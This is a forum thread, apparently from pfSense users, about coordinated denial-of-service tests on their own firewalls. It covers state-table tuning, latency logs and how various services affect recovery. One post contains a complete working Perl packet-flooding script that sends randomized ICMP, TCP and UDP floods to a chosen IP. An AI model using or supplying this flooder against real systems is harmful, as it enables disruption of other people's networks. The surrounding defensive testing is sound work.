What is the biggest attack in GBPS you stopped
-
INteresting!
-
@Supermule, I dont see a PM so I'm guessing you dont want to share the script in a bid to potentially solve the problem. Correct?
-
We are conducting some testing now with interesting results. Will post more when we're done.
-
#!/usr/bin/perl -w
=================================================
simple network flooder script
takes type of flood (icmp, tcp, udp) as param
optionally takes dest ip and packet count
=================================================
my $VERSION = 0.5;
=================================================
use strict;
use Net::RawIP;my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';sub icmpflood() {
my($dstip, $pktct, $code, $type, $frag);
$dstip = shift;
$pktct = shift;print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {$code = int(rand(255));
$type = int(rand(255));
$frag = int(rand(2));my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
icmp => {
code => $code,
type => $type,
}
});$packet->send;
print "sent icmp $type->$code, frag: $frag\n";
}
print "\nflood complete\n\n";
}sub tcpflood() {
my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
$dstip = shift;
$pktct = shift;
print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {$sport = int(rand(65535));
$dport = int(rand(65535));
$frag = int(rand(2));
$urg = int(rand(2));
$psh = int(rand(2));
$rst = int(rand(2));
$fin = int(rand(2));
$syn = int(rand(2));
$ack = int(rand(2));my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
tcp => {
source => $sport,
dest => $dport,
urg => $urg,
psh => $psh,
rst => $rst,
fin => $fin,
syn => $syn,
ack => $ack,
}
});$packet->send;
print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
}
print "\nflood complete\n\n";
}sub udpflood() {
my($dstip, $pktct, $sport, $dport, $frag);
$dstip = shift;
$pktct = shift;print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {$sport = int(rand(255));
$dport = int(rand(255));
$frag = int(rand(2));my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
udp => {
source => $sport,
dest => $dport,
}
});$packet->send;
print "sent udp packet from $sport to $dport, frag: $frag\n";
}
print "\nflood complete\n\n";
}sub usage() {
print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcountexample:
$0 [tcp udp icmp] \n\n";
exit 0;
} -
Here is some data from the attack that Supermule, almabes, and I coordinated today.
The initial SYN flood attack disabled my WAN2 interface and brought my pfSense box to a crawl. However, I had the console running and saw this:
This was easy to fix by increasing the amount of states. My pfSense installation is set to the default limit of 394000, so I first increased it to 4,000,000 and then to 8,000,000. After doing that, the pfSense box responded fine. I have 4 NICs in the box—WAN1, WAN2, LAN1, and LAN2. The attack was on WAN2, and all other interfaces and pfSense worked perfectly normal while WAN2 went down hard.
Here is part of the Skype transcript with some real-time metrics:
[5/23/15, 5:03:12 PM] Tim McManus: Ok [5/23/15, 5:03:25 PM] Tim McManus: UI is good. [5/23/15, 5:03:37 PM] Tim McManus: Wan1 good. [5/23/15, 5:03:53 PM] Tim McManus: 4mbit attack. [5/23/15, 5:04:21 PM] Tim McManus: 3M states. [5/23/15, 5:04:43 PM] Tim McManus: 3.2M states. [5/23/15, 5:05:07 PM] Tim McManus: Wan2 dead. [5/23/15, 5:05:15 PM] Tim McManus: Wan1 fine. [5/23/15, 5:06:42 PM] Tim McManus: Wan2 is crushed. 700ms Rtt ping. Normally 30ms tops. [5/23/15, 5:06:58 PM] Tim McManus: But the box is running fine. [5/23/15, 5:07:06 PM] Tim McManus: 4M states. [5/23/15, 5:07:22 PM] Tim McManus: UI is fine. [5/23/15, 5:07:48 PM] Tim McManus: UI is real fast. [5/23/15, 5:08:03 PM] Tim McManus: Just bumped states to 8M. [5/23/15, 5:08:22 PM] Tim McManus: Ping is now 13 ms. [5/23/15, 5:08:36 PM] Tim McManus: 115 me it incoming wan2. [5/23/15, 5:08:41 PM] Tim McManus: Mbit [5/23/15, 5:09:18 PM] Tim McManus: Wan2 is slower but working fine. [5/23/15, 5:10:26 PM] Tim McManus: 4.7M states. [5/23/15, 5:10:39 PM] Tim McManus: Rtt is 160ms. [5/23/15, 5:10:53 PM] Tim McManus: Wan2 down. [5/23/15, 5:11:04 PM] Tim McManus: Back [5/23/15, 5:11:09 PM] Tim McManus: Rtt 900 ms. [5/23/15, 5:11:28 PM] Tim McManus: 4.8M states. [5/23/15, 5:11:56 PM] Tim McManus: 4mbit incoming. [5/23/15, 5:12:33 PM] Tim McManus: High latency alert on the UI. [5/23/15, 5:13:13 PM] Tim McManus: Wan2 down. Wan1 fine. [5/23/15, 5:14:28 PM] Tim McManus: UI has been fine since I increased the state table.
The console looked like this through the attack:
Although the box was crippled from the Web UI, the console worked fine. However, the initial attack took out all of the graphing and it looks like historical RRD graphs were also affected. I have a gap from when the attack started until after I rebooted the box. Those services did not come back online. The box was rebooted a couple of hours after the attack. Graphing shows that gap.
I have additional data and metrics from my OpenNMS monitoring box as well as my AllGraphs and system logs. The development team is more than welcome to PM me for them, but at this point I'm not going to publicly she them. It seems like the attack will saturate PF states and significantly impairs the box, but increasing the amount of states allows the box to stay up while the interface is taken down.
We will probably do some additional testing, but this is my quick summary of what we discovered.
It is important to note that I have 4 x 1Gb NICs, an i3, and 4GB of RAM. I can list all of the details of this box and the topology in another post if anyone is interested. We were also running Wireshark during the test, and I have some, but not all, packet captures from that. That was a useful tool to see when an interface was being attacked and by what method.
-
Can someone give a proper summary of what the problem actually is so others don't have to wade through 20+ pages to find the info?
Specifically: Is the traffic in question actually passed, or blocked? Is a service on the firewall running pfSense (such as the GUI) exposed to the test source or is the traffic being passed through to an internal host (port forward, routed, etc)? – This is important because a SYN flood to pfSense as a host is completely different than a flood through pfSense as a forwarder/firewall.
If the traffic is passing through the firewall, using rules to clamp down state limits, or going stateless properly (floating quick OUT rules to pass out with no state along with the pass in rules on the other tabs) may help.
If the traffic is targeting the firewall itself, then there are things that can be tweaked (syncache parameters, for example), but it's yet another reason the services on the firewall such as the GUI and SSH should not be exposed to the Internet in general. State limits can help there as well.
Also the "size" of an attack in Mbit/s or Gbit/s is not as important to know as the PPS rate which tends to be the limiting factor when dealing with small packets such as this.
Some answers to your questions based on today's testing:
Is the traffic in question actually passed, or blocked? Both. It was mostly blocked but the SYN flood was stopped. There were several different kinds of attacks, but the SYN was blocked.
Is a service on the firewall running pfSense (such as the GUI) exposed to the test source or is the traffic being passed through to an internal host (port forward, routed, etc)? Traffic was focused on the external IP to ports 80 and 443. No services were exposed on either WAN interface. The external IP of WAN2 forwarded ports 80 and 443 to an internal address running a web server.
This is important because a SYN flood to pfSense as a host is completely different than a flood through pfSense as a forwarder/firewall. I believe, but cannot be certain, that when my WAN1 interface was attacked with the same SYN flood we had the same issue. WAN1 does not forward any ports. I didn't have Wireshark running at this time on that interface, but we can always retest.
-
I don't know if they were the same tests, but my i5 3.2ghz i350-T2 NIC took tens of megabits. I didn't think to have my console on, so I don't know if there was an interrupt storm. The i350 seems to be really good at keeping interrupts low I don't know how, but the interrupt rate is pretty much identical between load and idle during normal usage. But not sure under the attack.
-
I don't know if they were the same tests, but my i5 3.2ghz i350-T2 NIC took tens of megabits. I didn't think to have my console on, so I don't know if there was an interrupt storm. The i350 seems to be really good at keeping interrupts low I don't know how, but the interrupt rate is pretty much identical between load and idle during normal usage. But not sure under the attack.
I specifically wanted to run top during the attack to determine if the issue was load or a specific process. CPU never hit 50%. I was hit with 118Mbit attacks, and the other 3 interfaces were fine as well as the pfSense box.
But I strongly recommend running the console during a test attack.
-
So it looks like an i5 handles better than an i3 but dont know if the i5 also has same amount of ram or not?
Its generally useful to post the hw specs perhaps in the sig as I've found this useful for debugging problems in programming languages.
I'll be trying this later on today in a couple of VM's (virtual pc's running on vm ware) as I can control number of core's, network speed and other tweaks, not to mention setup many many nics and having 32Gb on my dev machine so I can give the virtual pfsense more ram & more cores to see if that or other hw like spin disks or ssd's becomes a factor.
Anyone get anywhere with the syn flooding & dtrace links I pm'ed to almabes?
-
Tim is running pfsense on bare metal. Almabes is running in a VM.
We have tested the two scenarios before, and both were taken offline.
Almabes modem died during the test and didnt com back online unless he manually rebooted it. He runs Cisco.
I run dual Xeon's
http://ark.intel.com/products/33927/Intel-Xeon-Processor-E5420-12M-Cache-2_50-GHz-1333-MHz-FSB
A little note here that could contain a clue.
When I disabled services as per the picture, then the box recovered really quickly in the VM.
The overall load was lower as expected but after the CPU spiked during the attack, the recovery period was significantly shorter without the services running.
-
Somewhat interesting findings this morning…
I turned Apinger Daemon on again as the only thing and the box died on me completely when attacked.
Recovery time was very long and 2-3 minutes extra downtime before the box was responding again.
-
Turned of Apinger and turned on Cron.
Much more responsive GUI and the traffic graphs didnt die on me completely this time.
Recovered instantly after the attack was stopped.
-
When enabling NTP, the box responsiveness became worse.
Not updating the graphs as quickly and a little worse in recovery time as seen in the little bend in the right hand corner of the last CPU graph from VmWare. It was a 15-20 second longer recovery.
-
Enabled Snort to see if it made things worse.
The answer to that is yes and no… initial phase was really good, since it took out the initial spike in CPU and made the load more even (slower boost). CPU had a shorter MAX load interval than on previous attacks.
It activated a more even CPU usage on the 8 cores and recovery was really good.
Traffic graphs didnt fare as well as with Cron only running.
-
When Snort AND Cron were enabled the graphs looked like this…
Total load was higher, but recovery was fine but initial CPU offloading was not there anymore.
-
Enabling Apinger did not do any good to the box as expected.
More CPU on top and a minute longer to recover. For what its worth, the impact didnt seem as big as the first test but still a trend (big).
Traffic graphs very unresponsive as the rest of the GUI. It dies on the first CPU spike in the GUI.
-
So maybe some services are more resource hungry and/or less refined in the scheme of things.
I wonder if there would be any benefit in having two firewalls in series, where the forward facing/1st was stripped of all unnecessary tasks/services, then the 2nd inline firewall had the unnecessary services/tasks running on it?
It certainly seems like there might not be any one property, service/task which is at fault, but maybe a combination of things which can affect how well the system stays up.
Have you seen the links I pm'ed almabes regarding setting up pfsense to reduce/avoid syn floods? If so did you give them ago and how did they perform?
-
I did not see the links.
States is about 1% on the box and it has limiters to how many states can be created pr. rule.
Running SYn Proxy state with allowance of 50 new connections pr. sec.
That allows the state table to have some "air" but it doesnt help much.
-
I have come a BIG step closer to locating the culprit.
Look at the graphs when NTPD is enabled.
It destroys the GUI completely and takes the interfaces offline in the GUI. No response from them. The graphs is a 3 minute attack and only maybe 10 seconds are showing.
Whats really interesting is the VmWare graph. When it spikes for the last time, the GUI comes back and the CPU graph in the GUI starts working again.
Wonder if NTPD and Apinger together could make something?
-
Deleted the Vmware Tools package and tested again.
Did a little better this time with NTPD and Apinger running.
Little spike before the last one is a reboot. Recovery took about a minute longer than usual.